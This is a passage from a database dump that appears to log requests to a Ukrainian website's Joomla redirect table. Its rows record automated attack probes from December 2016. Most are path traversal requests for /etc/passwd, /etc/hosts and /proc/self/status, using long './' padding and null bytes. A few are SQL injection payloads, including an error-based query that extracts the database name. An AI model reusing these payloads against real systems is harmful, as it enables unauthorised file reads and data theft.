/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.',NULL,'','',1,0,'2016-12-21 13:00:55','0000-00-00 00:00:00',301),(2656,'http://ekvatorprint.com.ua/index.php?option=../../../../../../../../../../../../../../../../../../../../../../etc/hosts/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././',NULL,'','',1,0,'2016-12-21 13:00:56','0000-00-00 00:00:00',301),(2657,'http://ekvatorprint.com.ua/index.php?option=../../../../../../../../../../../../../../../../../../../../../../proc/self/status/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.',NULL,'','',1,0,'2016-12-21 13:01:02','0000-00-00 00:00:00',301),(2658,'http://ekvatorprint.com.ua/index.php?option=../../../../../../../../../../../../../../../../../../../../../../etc/passwd//./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././',NULL,'','',1,0,'2016-12-21 13:01:03','0000-00-00 00:00:00',301),(2659,'http://ekvatorprint.com.ua/index.php?option=../../../../../../../../../../../../../../../../../../../../../../etc/hosts//./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.',NULL,'','',1,0,'2016-12-21 13:01:04','0000-00-00 00:00:00',301),(2660,'http://ekvatorprint.com.ua/index.php?option=../../../../../../../../../../../../../../../../../../../../../../proc/self/status//././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././',NULL,'','',1,0,'2016-12-21 13:01:05','0000-00-00 00:00:00',301),(2661,'http://ekvatorprint.com.ua/index.php?option=com_users/../../../../../../../../../../../../../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.',NULL,'','',1,0,'2016-12-21 13:01:09','0000-00-00 00:00:00',301),(2662,'http://ekvatorprint.com.ua/index.php?option=com_users/../../../../../../../../../../../../../../../../../../../../../../etc/hosts/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././',NULL,'','',1,0,'2016-12-21 13:01:10','0000-00-00 00:00:00',301),(2663,'http://ekvatorprint.com.ua/index.php?option=com_users/../../../../../../../../../../../../../../../../../../../../../../proc/self/status/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.',NULL,'','',1,0,'2016-12-21 13:01:12','0000-00-00 00:00:00',301),(2664,'http://ekvatorprint.com.ua/index.php?option=com_users/../../../../../../../../../../../../../../../../../../../../../../etc/passwd//././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././',NULL,'','',1,0,'2016-12-21 13:01:14','0000-00-00 00:00:00',301),(2665,'http://ekvatorprint.com.ua/index.php?option=com_users/../../../../../../../../../../../../../../../../../../../../../../etc/hosts//././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.',NULL,'','',1,0,'2016-12-21 13:01:16','0000-00-00 00:00:00',301),(2666,'http://ekvatorprint.com.ua/index.php?option=com_users/../../../../../../../../../../../../../../../../../../../../../../proc/self/status//./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././',NULL,'','',1,0,'2016-12-21 13:01:17','0000-00-00 00:00:00',301),(2667,'http://ekvatorprint.com.ua/index.php?option=com_users\"+and+3>\"1&view=remind',NULL,'','',1,0,'2016-12-21 13:01:18','0000-00-00 00:00:00',301),(2668,'http://ekvatorprint.com.ua/index.php?option=com_users\"+and+3>\"4&view=remind',NULL,'','',1,0,'2016-12-21 13:01:18','0000-00-00 00:00:00',301),(2669,'http://ekvatorprint.com.ua/index.php?option=com_users&view=remind\'+oRdEr+bY+1+--+;',NULL,'','',1,0,'2016-12-21 13:01:21','0000-00-00 00:00:00',301),(2670,'http://ekvatorprint.com.ua/index.php?option=com_users&view=remind\'+ORDEr+By+999+--+;',NULL,'','',1,0,'2016-12-21 13:01:21','0000-00-00 00:00:00',301),(2671,'http://ekvatorprint.com.ua/index.php?option=com_users&view=-1\'+AND+(/*!SElEcT*/+8041+FRoM(/*!selEcT*/+COUNT(*),CONCAt((/*!SelEcT*/+concat(0x7c3a3a3a3a,substring(database(),1,52),0x3a3a3a3a7c)+),floor(rand(0)*2))x+FRoM+INFORMATION_SCHEMA.TABLES+GROuP+By+x)a)',NULL,'','',1,0,'2016-12-21 13:01:22','0000-00-00 00:00:00',301),(2672,'http://ekvatorprint.com.ua/index.php?option=com_users&view=../../../../../../../../../../../../../../../../../../../../../../etc/passwd',NULL,'','',2,0,'2016-12-21 13:01:22','0000-00-00 00:00:00',301),(2673,'http://ekvatorprint.com.ua/index.php?option=com_users&view=../../../../../../../../../../../../../../../../../../../../../../etc/hosts',NULL,'','',2,0,'2016-12-21 13:01:23','0000-00-00 00:00:00',301),(2674,'http://ekvatorprint.com.ua/index.php?option=com_users&view=../../../../../../../../../../../../../../../../../../../../../../proc/self/status',NULL,'','',2,0,'2016-12-21 13:01:24','0000-00-00 00:00:00',301),(2675,'http://ekvatorprint.com.ua/index.php?option=com_users&view=../../../../../../../../../../../../../../../../../../../../../../etc/passwd\0',NULL,'','',2,0,'2016-12-21 13:01:25','0000-00-00 00:00:00',301),(2676,'http://ekvatorprint.com.ua/index.php?option=com_users&view=../../../../../../../../../../../../../../../../../../../../../../etc/hosts\0',NULL,'','',2,0,'2016-12-21 13:01:25','0000-00-00 00:00:00',301),(2677,'http://ekvatorprint.com.ua/index.php?option=com_users&view=../../../../../../../../../../../../../../../../../../../../../../proc/self/status\0',NULL,'','',2,0,'2016-12-21 13:01:26','0000-00-00 00:00:00',301),(2678,'http://ekvatorprint.com.ua/index.php?option=com_users&view=../../../../../../../../../../../../../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././',NULL,'','',1,0,'2016-12-21 13:01:27','0000-00-00 00:00:00',301),(2679,'http://ekvatorprint.com.ua/index.php?option=com_users&view=../../../../../../../../../../../../../../../../../../../../../../etc/hosts/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.',NULL,'','',1,0,'2016-12-21 13:01:28','0000-00-00 00:00:00',301),(2680,'http://ekvatorprint.com.ua/index.php?option=com_users&view=../../../../../../../../../../../../../../../../../../../../../../proc/self/status/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././',NULL,'','',1,0,'2016-12-21 13:01:32','0000-00-00 00:00:00',301),(2681,'http://ekvatorprint.com.ua/index.php?option=com_users&view=../../../../../../../../../../../../../../../../../../../../../../etc/passwd//./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.',NULL,'','',1,0,'2016-12-21 13:01:33','0000-00-00 00:00:00',301),(2682,'http://ekvatorprint.com.ua/index.php?option=com_users&view=../../../../../../../../../../../../../../../../../../../../../../etc/hosts//././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././',NULL,'','',1,0,'2016-12-21 13:01:34','0000-00-00 00:00:00',301),(2683,'http://ekvatorprint.com.ua/index.php?option=com_users&view=../../../../../../../../../../../../../../../../../../../../../../proc/self/status//././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.',NULL,'','',1,0,'2016-12-21 13:01:35','0000-00-00 00:00:00',301),(2684,'http://ekvatorprint.com.ua/index.php?option=com_users&view=remind/../../../../../../../../../../../../../../../../../../../../../../etc/passwd\0',NULL,'','',2,0,'2016-12-21 13:01:36','0000-00-00 00:00:00',301),(2685,'http://ekvatorprint.com.ua/index.php?option=com_users&view=remind/../../../../../../../../../../../../../../../../../../../../../../etc/hosts\0',NULL,'','',2,0,'2016-12-21 13:01:37','0000-00-00 00:00:00',301),(2686,'http://ekvatorprint.com.ua/index.php?option=com_users&view=remind/../../../../../../../../../../../../../../../../../../../../../../proc/self/status\0',NULL,'','',2,0,'2016-12-21 13:01:38','0000-00-00 00:00:00',301),(2687,'http://ekvatorprint.com.ua/index.php?option=com_users&view=remind/../../../../../../../../../../../../../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.',NULL,'','',1,0,'2016-12-21 13:01:39','0000-00-00 00:00:00',301),(2688,'http://ekvatorprint.com.ua/index.php?option=com_users&view=remind/../../../../../../../../../../../../../../../../../../../../../../etc/hosts/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././',NULL,'','',1,0,'2016-12-21 13:01:41','0000-00-00 00:00:00',301),(2689,'http://ekvatorprint.com.ua/index.php?option=com_users&view=remind/../../../../../../../../../../../../../../../../../../../../../../proc/self/status/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.',NULL,'','',1,0,'2016-12-21 13:01:42','0000-00-00 00:00:00',301),(2690,'http://ekvatorprint.com.ua/index.php?option=com_users&view=remind/../../../../../../../../../../../../../../../../../../../../../../etc/passwd//././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././',NULL,'','',1,0,'2016-12-21 13:01:43','0000-00-00 00:00:00',301),(2691,'http://ekvatorprint.com.ua/index.php?option=com_users&view=remind/../../../../../../../../../../../../../../../../../../../../../../etc/hosts//././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.',NULL,'','',1,0,'2016-12-21 13:01:45','0000-00-00 00:00:00',301),(2692,'http://ekvatorprint.com.ua/index.php?option=com_users&view=remind/../../../../../../../../../../../../../../../../../../../../../../proc/self/status//./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.